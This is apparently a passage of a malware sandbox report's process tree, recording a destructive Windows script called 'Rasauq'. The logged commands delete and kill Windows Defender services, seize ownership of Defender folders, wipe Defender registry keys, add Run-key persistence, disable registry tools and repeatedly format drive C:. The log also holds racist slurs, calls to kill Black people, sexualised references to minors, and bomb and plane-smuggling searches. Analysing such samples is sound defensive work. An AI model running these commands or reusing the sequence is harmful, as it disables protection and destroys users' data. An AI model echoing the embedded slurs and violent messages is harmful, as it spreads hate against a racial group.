- Launches sc.exe
PID:2128
-
-
C:\Windows\system32\sc.exesc delete SecurityHealthService4⤵
- Launches sc.exe
PID:2072
-
-
C:\Windows\system32\sc.exesc stop Sense4⤵PID:5576
-
-
C:\Windows\system32\sc.exesc delete Sense4⤵
- Launches sc.exe
PID:580
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MsMpEng.exe /T4⤵
- Kills process with taskkill
PID:4168
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MpCmdRun.exe /T4⤵
- Kills process with taskkill
PID:5720
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SecurityHealthSystray.exe /T4⤵
- Kills process with taskkill
PID:2228
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM smartscreen.exe /T4⤵
- Kills process with taskkill
PID:4688
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2212
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5440
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1076
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2196
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f4⤵PID:4036
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f4⤵PID:4696
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f4⤵PID:5488
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f4⤵PID:4324
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\notepad.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2824
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3860
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\calc.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3560
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1392
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:916
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4236
-
-
C:\Windows\system32\powercfg.exepowercfg /hibernate off REM Disables hibernation4⤵
- Power Settings
PID:1748
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in4⤵
- Power Settings
PID:5424
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-dc 0 REM Prevents sleep on battery4⤵
- Power Settings
PID:3220
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in4⤵
- Power Settings
PID:5544
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "Device Name"4⤵
- Power Settings
- Checks SCSI registry key(s)
PID:1204
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "USB Root Hub"4⤵
- Power Settings
- Checks SCSI registry key(s)
PID:3832
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f4⤵
- Adds Run key to start application
PID:4172
-
-
C:\Windows\system32\reg.exereg add "HKCR\behead all niggers" /f4⤵
- Modifies registry class
PID:3808
-
-
C:\Windows\system32\reg.exereg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f4⤵PID:3612
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"4⤵PID:4420
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f4⤵
- Adds Run key to start application
PID:3720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k4⤵PID:4428
-
C:\Windows\system32\reg.exereg query "HKU" /s /f "Software" /k5⤵PID:5860
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f4⤵PID:3812
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:3112
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:5128
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:5204
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:5832
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:5916
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:4940
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:4280
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:2268
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:2448
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:2672
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:2156
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f4⤵PID:4948
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:4628
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:1520
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:5360
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:3052
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f4⤵PID:3584
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:3496
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\Software\Software\Software\Rasauq on top" /f4⤵PID:2068
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Software\Rasauq on top" /f4⤵PID:5872
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f4⤵PID:4168
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\AppDataLow\Software\Software\Software\Rasauq on top" /f4⤵PID:1964
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f4⤵PID:5284
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Software\Rasauq on top" /f4⤵PID:4536
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f4⤵PID:6008
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:1848
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:3420
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Software\Software\Rasauq on top" /f4⤵PID:2132
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:4764
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:5732
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:3140
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:4648
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:5604
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵PID:5828
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵PID:4688
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:4504
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:1620
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Software\Software\Rasauq on top" /f4⤵PID:5980
-
-
C:\Windows\system32\reg.exereg add "End of search: 39 match(es) found.\Software\Rasauq on top" /f4⤵PID:544
-
-
C:\Windows\system32\msg.exemsg * /time:3 "This machine has been compromised by Rasuaq"4⤵PID:3728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn-cf-east.streamable.com/video/mp4/j3mt4w.mp4?Expires=17424670400714⤵PID:5468
-
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak4⤵
- Delays execution with timeout.exe
PID:4828
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f4⤵PID:5980
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4840
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4824
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:1928
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6000
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:1756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2972
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2496
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:668
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:72
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:896
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:4152
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5776
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4900
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:3608
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2072
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3660
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:1704
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:3504
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:2304
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:3272
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5424
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4924
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4508
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:3756
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3732
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5464
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2464
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4900
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:1520
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4100
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:2280
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1704
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:856
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6000
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2132
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5004
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:5432
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:72
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4212
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:3688
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:2976
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:3224
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:5432
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6068
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3612
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4660
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:4100
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:5488
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:3496
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:3220
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:3128
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4028
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:380
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:6000
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2272
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:3420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:5492
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:3088
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:308
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:4088
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4844
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:3664
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4288
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3176
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5360
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:2364
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:1384
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:3748
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:1548
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:1028
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:3636
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:1008
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5096
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4760
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:1468
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:6116
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4172
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2848
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4928
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:1616
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:1384
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5820
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5744
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4004
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:3748
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5504
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:1548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:4768
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:1856
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:3124
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:3636
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:4248
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:2104
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:1032
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4756
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4020
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:4288
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:2156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3812
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:1960
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:5072
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:1372
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5828
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:4056
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:4012
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:3700
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5528
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:3636
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:1136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:460
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2028
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:4968
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:6056
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:3176
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:2168
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5500
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:4400
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:5360
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:1512
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:4700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:2800
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:2320
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:5316
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=where+to+buy+gunpowder"4⤵PID:1676
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"4⤵PID:5228
-
-
C:\Windows\system32\format.comformat C: /fs:NTFS /q /y4⤵PID:5916
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵PID:5252
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵PID:2060
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵PID:4380
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵PID:5668
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵PID:5652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵PID:3808
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵PID:236
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=how+to+make+a+bomb"4⤵PID:3608
-
-
